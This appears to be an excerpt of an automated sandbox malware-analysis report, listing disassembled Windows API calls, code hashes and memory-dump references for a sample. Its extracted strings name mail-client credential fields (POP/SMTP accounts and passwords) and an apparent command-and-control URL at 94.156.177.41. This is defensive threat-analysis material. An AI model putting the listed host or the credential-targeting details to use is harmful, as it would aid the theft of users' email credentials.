                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileMove
                              • String ID:
                              • API String ID: 3562171763-0
                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                              APIs
                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                              APIs
                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                              APIs
                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open
                              • String ID:
                              • API String ID: 71445658-0
                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                              APIs
                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteFile
                              • String ID:
                              • API String ID: 4033686569-0
                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                              APIs
                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                              APIs
                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                              APIs
                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                              APIs
                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                              APIs
                              • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID:
                              • API String ID: 1174141254-0
                              • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                              • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                              • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                              • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                              APIs
                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: closesocket
                              • String ID:
                              • API String ID: 2781271927-0
                              • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                              • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                              • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                              • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                              APIs
                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                              • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                              • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                              • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                              APIs
                              • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                              APIs
                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                              • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                              • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                              • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                              APIs
                              • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                              • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                              • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                              • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                              APIs
                              • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                              • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                              • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                              • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 0040438F
                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                              • VariantInit.OLEAUT32(?), ref: 004043C4
                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                              • VariantInit.OLEAUT32(?), ref: 00404414
                              • SysAllocString.OLEAUT32(?), ref: 00404419
                              • VariantInit.OLEAUT32(?), ref: 00404431
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                              • String ID:
                              • API String ID: 1312198159-0
                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                              • API String ID: 0-2111798378
                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 94.156.177.41/simple/five/fre.php
                              • API String ID: 0-2274625065
                              • Opcode ID: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
                              • Instruction ID: a50a5f0329aa3bfe82f98588002e05078d35de0dbdea340faab09d79a53c7e1b
                              • Opcode Fuzzy Hash: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
                              • Instruction Fuzzy Hash: BBF0F462D491A47ADB301D565C00FB3FEA98B9B7B0F14312AB98877241C269CD41C29C
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                              • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                              • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                              • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                              • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                              • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                              • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64